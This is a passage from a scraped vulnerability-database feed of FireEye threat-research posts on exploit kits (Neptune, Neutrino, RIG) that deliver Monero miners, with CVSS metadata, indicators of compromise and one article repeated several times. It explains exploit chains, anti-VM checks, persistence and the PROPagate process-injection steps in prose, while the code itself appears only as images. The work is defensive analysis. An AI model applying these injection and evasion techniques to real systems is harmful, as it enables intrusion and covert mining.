[CVE-2014-6332](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) \u2013 Internet Explorer\n * [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) \u2013 Adobe Flash Player\n * [CVE-2015-7645](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645>) \u2013 Adobe Flash Player\n\n#### Payload (Monero miner)\n\nThe payload is dropped as a plain executable from one of the URI\u2019s belonging to the EK domain (same as the landing page). Figure 7 shows a typical response header for these cases.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig7.png) \nFigure 7: Response header for Monero miner payload\n\nPost infection traffic shows an attempt to connect to minergate[.]com (Figure 8) and a login attempt using the cpu-miner service via the login email monsterkill20@mail[.]com (Figure 9). Login attempts are invoked via the command line:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Command%20Line%201.png)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig8.png) \nFigure 8: DNS query to minergate[.]com\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Hiking%20malvertising/Fig9.png) \nFigure 9: Login attempt\n\n#### Conclusion\n\nDespite an observable decline in exploit kit activity, users are still at risk, especially if they have outdated or unpatched software. This threat is especially dangerous considering drive-by exploit kits (such as Neptune EK) can use malvertisements to seamlessly download payloads without ever alerting of the user.\n\nFireEye NX [detects exploit kit infection attempts](<https://www.fireeye.com/products/nx-network-security-products.html>) before the malware payload is downloaded to the user\u2019s machine. Additionally, malware payloads dropped by exploit kits are detected in all other FireEye products.\n\n#### Indicators of Compromise\n\n##### Malvertisement domains:\n\n * hxxp://treknepal[.]club/\n * hxxp://highspirittrecks[.]club\n * hxxp://advnepaltrekking[.]club\n * hxxp://nepalyogatrek[.]club\n * hxxp://flvto[.]download\n\n##### Malvertisement IPs:\n\n * 95.85.62.226\n * 185.82.202.36\n\n##### EK domains (current active) registrant:\n\nDomain Name: MANAGETHEWORLD.US \nDomain ID: D59392852-US \nSponsoring Registrar: NAMECHEAP, INC. \nSponsoring Registrar IANA ID: 1068 \nRegistrar URL (registration services): http://www.namecheap[.]com \nDomain Status: clientTransferProhibited \nRegistrant ID: NLGUS4BVD3M2DN2Y \nRegistrant Name: kreb son \nRegistrant Address1: Maker 541 \nRegistrant City: Navada \nRegistrant State/Province: SA \nRegistrant Postal Code: 546451 \nRegistrant Country: Bulgaria \nRegistrant Country Code: BG \nRegistrant Phone Number: +44.45623417852 \nRegistrant Email: gabendollar399@gmx[.]com \nRegistrant Application Purpose: P1 \nRegistrant Nexus Category: C11 \nAdministrative Contact ID: VNM50NNJ5Y0VNLDY \nAdministrative Contact Name: kreb son \nAdministrative Contact Address1: Maker 541 \nAdministrative Contact City: Navada \nAdministrative Contact State/Province: SA \nAdministrative Contact Postal Code: 546451 \nAdministrative Contact Country: Bulgaria \nAdministrative Contact Country Code: BG \nAdministrative Contact Phone Number: +44.45623417852 \nAdministrative Contact Email: gabendollar399@gmx[.]com\n\n##### Sample EK URI Pattern:\n\nforum_jVpbUAr/showthread.php?id=xxxxxxx\n\n##### Sample MD5s:\n\nb678ac0b870b78060a2a9f599000302d \n5a18c92e148bbd7f10077f8e7431326e\n\n#### Acknowledgement\n\nWe would like to thanks Hassan Faizan for his contributions to this discovery.\n", "edition": 2, "cvss3": {}, "published": "2017-08-22T10:00:00", "type": "fireeye", "title": "Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2015-8651", "CVE-2015-2419", "CVE-2015-7645"], "modified": "2017-08-22T10:00:00", "id": "FIREEYE:D549372E644DEECBB7AEE8031D35DA4D", "href": "https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:29", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig1.png)\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig2.png)\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig3.png)\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T20:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-8651", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-07-14T20:37:00", "id": "FIREEYE:FAB9D3AA433B8323FF6FA7ABC6AD4069", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig1.png)\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig2.png)\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig3.png)\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:94FA42F08227BCEDB46BD7010CC3A45D", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-17T14:44:04", "description": "A security researcher recently published [source code](<https://github.com/theori-io/cve-2016-0189>) for a working exploit for CVE-2016-0189 and the Neutrino Exploit Kit (EK) quickly adopted it.\n\nCVE-2016-0189 was originally exploited as a zero-day vulnerability in [targeted attacks in Asia](<http://www.symantec.com/connect/blogs/internet-explorer-zero-day-exploit-used-targeted-attacks-south-korea>). The vulnerability resides within scripting engines in Microsoft\u2019s Internet Explorer (IE) browser, and is exploited to achieve Remote Code Execution (RCE). According to the researcher\u2019s repository, the open source exploit affects IE on at least Windows 10. It is possible that attackers could use or repurpose the attack for earlier versions of Windows.\n\nMicrosoft patched [CVE-2016-0189 in May on Patch Tuesday](<https://technet.microsoft.com/en-us/library/security/ms16-may.aspx>). Applying this patch will protect a system from this exploit.\n\n##### Attack Details \n\n\nThe popular Neutrino EK was quick to adopt this exploit. Neutrino works by embedding multiple exploits into one Shockwave Flash (SWF) file. Once run, the SWF profiles the victim\u2019s system \u2013 shown in Figure 1 \u2013 to determine which of its embedded exploits to use.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig1.png)\n\nFigure 1. Neutrino EK SWF profiles a victim\n\nNext, it decrypts and runs the applicable exploit, as shown in Figure 2. This is different from most other EKs, in which an earlier HTML/JavaScript stage profiles the browser and selectively downloads exploits from the server.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig2.png)\n\nFigure 2. Decrypt and embed the selected exploit into an iframe\n\nIn this example, Neutrino embedded exploits for five vulnerabilities that have been patched since May or earlier: three for Adobe Flash Player (CVE-2016-4117, CVE-2016-1019, CVE-2015-8651) and two for Internet Explorer (CVE-2016-0189, CVE-2014-6332). CVE-2016-0189 is the newest addition to Neutrino\u2019s arsenal.\n\n##### CVE-2016-0189\n\nThis CVE-2016-0189 vulnerability stems from a failure to put a lock on an array before working on it. This omission can lead to an issue when the array is changed while another function is in the middle of working on it. Memory corruption can occur if the \u201cvalueOf \u201c property of the array is set to a script function that changes the array size, as shown in Figure 3.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Exploit%20Kits%20Quickly%20Adopt%20Ken%20Johnson/Fig3.png)\n\nFigure 3. Neutrino setting triggering conditions\n\nAfter Microsoft released the patch, a security researcher compared the original and patched programs to identify the root cause of the vulnerability and create a fully functioning exploit. The exploit embedded within Neutrino is identical to this researcher\u2019s exploit, except for the code that runs after initial control.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-14T16:37:00", "type": "fireeye", "title": "Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-07-14T16:37:00", "id": "FIREEYE:0A49354849202DA95FE69EEC5811E6DD", "href": "https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-04-18T16:34:44", "description": "#### Introduction\n\nThrough FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the [PROPagate injection technique](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject code that downloads and executes a Monero miner (similar activity has been reported by [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/>)). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.\n\n#### Attack Chain\n\nThe attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig1a.png) \nFigure 1: Attack chain flow chart\n\n#### Exploit Kit Analysis\n\nWhen the user visits a compromised site that is injected with an iframe, the iframe loads the landing page. The iframe injected into a compromised website is shown in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig2.png) \nFigure 2: Injected iframe\n\nThe landing page contains three different JavaScripts snippets, each of which uses a different technique to deliver the payload. Each of these are not new techniques, so we will only be giving a brief overview of each one in this post.\n\n#### JavaScript 1\n\nThe first JavaScript has a function, fa, which returns a VBScript that will be executed using the execScript function, as shown by the code in Figure 3.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig3.png) \nFigure 3: JavaScript 1 code snippet\n\nThe VBScript exploits [CVE-2016-0189](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) which allows it to download the payload and execute it using the code snippet seen in Figure 4.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig4.png) \nFigure 4: VBScript code snippet\n\n#### JavaScript 2\n\nThe second JavaScript contains a function that will retrieve additional JavaScript code and append this script code to the HTML page using the code snippet seen in Figure 5.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig5.png) \nFigure 5: JavaScript 2 code snippet\n\nThis newly appended JavaScript exploits [CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>) which utilizes a vulnerability in JSON.stringify. This script obfuscates the call to JSON.stringify by storing pieces of the exploit in the variables shown in Figure 6.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig6.png) \nFigure 6: Obfuscation using variables\n\nUsing these variables, the JavaScript calls JSON.stringify with malformed parameters in order to trigger CVE-2015-2419 which in turn will cause native code execution, as shown in Figure 7.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig7.png) \nFigure 7: Call to JSON.Stringify\n\n#### JavaScript 3\n\nThe third JavaScript has code that adds additional JavaScript, similar to the second JavaScript. This additional JavaScript adds a flash object that exploits [CVE-2018-4878](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>), as shown in Figure 8.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig8.png) \nFigure 8: JavaScript 3 code snippet\n\nOnce the exploitation is successful, the shellcode invokes a command line to create a JavaScript file with filename u32.tmp, as shown in Figure 9.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig9.png) \nFigure 9: WScript command line\n\nThis JavaScript file is launched using WScript, which downloads the next-stage payload and executes it using the command line in Figure 10.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig10.png) \nFigure 10: Malicious command line\n\n#### Payload Analysis\n\nFor this attack, the actor has used multiple payloads and anti-analysis techniques to bypass the analysis environment. Figure 11 shows the complete malware activity flow chart.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig11a.png) \nFigure 11: Malware activity flow chart\n\n#### Analysis of NSIS Loader (SmokeLoader)\n\nThe first payload dropped by the RIG EK is a compiled NSIS executable famously known as SmokeLoader. Apart from NSIS files, the payload has two components: a DLL, and a data file (named \u2018kumar.dll\u2019 and \u2018abaram.dat\u2019 in our analysis case). The DLL has an export function that is invoked by the NSIS executable. This export function has code to read and decrypt the data file, which yields the second stage payload (a portable executable file).\n\nThe DLL then spawns itself (dropper) in SUSPENDED_MODE and injects the decrypted PE using process hollowing.\n\n#### Analysis of Injected Code (Second Stage Payload)\n\nThe second stage payload is a highly obfuscated executable. It consists of a routine that decrypts a chunk of code, executes it, and re-encrypts it.\n\nAt the entry point, the executable contains code that checks the OS major version, which it extracts from the Process Environment Block (PEB). If the OS version value is less than 6 (prior to Windows Vista), the executable terminates itself. It also contains code that checks whether the executable is in debugged mode, which it extracts from offset 0x2 of the PEB. If the _BeingDebugged_ flag is set, the executable terminates itself.\n\nThe malware also implements an Anti-VM check by opening the registry key **HKLM\\SYSTEM\\ControlSet001\\Services\\Disk\\Enum** with value 0.\n\nIt checks whether the registry value data contains any of the strings: vmware, virtual, qemu, or xen. Each of these strings is indictative of virtual machines\n\nAfter running the anti-analysis and environment check, the malware starts executing the core code to perform the malicious activity.\n\nThe malware uses the [PROPagate injection method](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject and execute the code in a targeted process. The PROPagate method is similar to the SetWindowLong injection technique. In this method, the malware uses the SetPropA function to modify the callback for UxSubclassInfo and cause the remote process to execute the malicious code.\n\nThis code injection technique only works for a process with lesser or equal integrity level. The malware first checks whether the integrity of the current running process is medium integrity level (2000, SECURITY_MANDATORY_MEDIUM_RID). Figure 12 shows the code snippet.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig12.png) \nFigure 12: Checking integrity level of current process\n\nIf the process is higher than medium integrity level, then the malware proceeds further. If the process is lower than medium integrity level, the malware respawns itself with medium integrity.\n\nThe malware creates a file mapping object and writes the dropper file path to it and the same mapping object is accessed by injected code, to read the dropper file path and delete the dropper file. The name of the mapping object is derived from the volume serial number of the system drive and a XOR operation with the hardcoded value (Figure 13).\n\n_File Mapping Object Name = \u201cVolume Serial Number\u201d + \u201cVolume Serial Number\u201d XOR 0x7E766791_\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig13.png) \nFigure 13: Creating file mapping object name\n\nThe malware then decrypts the third stage payload using XOR and decompresses it with RTLDecompressBuffer. The third stage payload is also a PE executable, but the author has modified the header of the file to avoid it being detected as a PE file in memory scanning. After modifying several header fields at the start of decrypted data, we can get the proper executable header (Figure 14).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig14.png) \nFigure 14: Injected executable without header (left), and with header (right)\n\nAfter decrypting the payload, the malware targets the shell process, explorer.exe, for malicious code injection. It uses GetShellWindow and GetWindowThreadProcessId APIs to get the shell window\u2019s thread ID (Figure 15).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig15.png) \nFigure 15: Getting shell window thread ID\n\nThe malware injects and maps the decrypted PE in a remote process (explorer.exe). It also injects shellcode that is configured as a callback function in SetPropA.\n\nAfter injecting the payload into the target process, it uses EnumChild and EnumProps functions to enumerate all entries in the property list of the shell window and compares it with UxSubclassInfo\n\nAfter finding the UxSubclassInfo property of the shell window, it saves the handle info and uses it to set the callback function through SetPropA.\n\nSetPropA has three arguments, the third of which is data. The callback procedure address is stored at the offset 0x14 from the beginning of data. Malware modifies the callback address with the injected shellcode address (Figure 16).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig16.png) \nFigure 16: Modifying callback function\n\nThe malware then sends a specific message to the window to execute the callback procedure corresponding to the UxSubclassInfo property, which leads to the execution of the shellcode.\n\nThe shellcode contains code to execute the address of the entry point of the injected third stage payload using CreateThread. It then resets the callback for SetPropA, which was modified by malware during PROPagate injection. Figure 17 shows the code snippet of the injected shellcode.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig17.png) \nFigure 17: Assembly view of injected shellcode\n\n#### Analysis of Third Stage Payload\n\nBefore executing the malicious code, the malware performs anti-analysis checks to make sure no analysis tool is running in the system. It creates two infinitely running threads that contain code to implement anti-analysis checks.\n\nThe first thread enumerates the processes using CreateToolhelp32Snapshot and checks for the process names generally used in analysis. It generates a DWORD hash value from the process name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the corresponding process.\n\nThe second thread enumerates the windows using EnumWindows. It uses GetClassNameA function to extract the class name associated with the corresponding window. Like the first thread, it generates a DWORD hash value from the class name using a custom operation and compares it with the array of hardcoded DWORD values. If the generated value matches any value in the array, it terminates the process related to the corresponding window.\n\nOther than these two anti-analysis techniques, it also has code to check the internet connectivity by trying to reach the URL: www.msftncsi[.]com/ncsi.txt.\n\nTo remain persistent in the system, the malware installs a scheduled task and a shortcut file in %startup% folder. The scheduled task is named \u201cOpera Scheduled Autoupdate {Decimal Value of GetTickCount()}\u201d.\n\nThe malware then communicates with the malicious URL to download the final payload, which is a Monero miner. It creates a MD5 hash value using Microsoft CryptoAPIs from the computer name and the volume information and sends the hash to the server in a POST request. Figure 18 shows the network communication.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig18.png) \nFigure 18: Network communication\n\nThe malware then downloads the final payload, the Monero miner, from the server and installs it in the system.\n\n#### Conclusion\n\nAlthough we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.\n\nFireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.\n\n#### Acknowledgement\n\nWe would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-28T16:00:00", "type": "fireeye", "title": "RIG Exploit Kit Delivering Monero Miner Via PROPagate Injection Technique", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419", "CVE-2016-0189", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-06-28T16:00:00", "id": "FIREEYE:D9B02C48E42AD3B4134C515CEB7E23C8", "href": "https://www.fireeye.com/blog/threat-research/2018/06/rig-ek-delivering-monero-miner-via-propagate-injection-technique.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "description": "#### Introduction\n\nThrough FireEye Dynamic Threat Intelligence (DTI), we observed RIG Exploit Kit (EK) delivering a dropper that leverages the [PROPagate injection technique](<http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/>) to inject code that downloads and executes a Monero miner (similar activity has been reported by [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/>)). Apart from leveraging a relatively lesser known injection technique, the attack chain has some other interesting properties that we will touch on in this blog post.\n\n#### Attack Chain\n\nThe attack chain starts when the user visits a compromised website that loads the RIG EK landing page in an iframe. The RIG EK uses various techniques to deliver the NSIS (Nullsoft Scriptable Install System) loader, which leverages the PROPagate injection technique to inject shellcode into explorer.exe. This shellcode executes the next payload, which downloads and executes the Monero miner. The flow chart for the attack chain is shown in Figure 1.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/RigEkMonero/Fig1a.png) \nFigure 1: Attack chain flow chart\n\n#### Exploit Kit Analysis\n\nWhen the user visits a compromised site that is injected with an 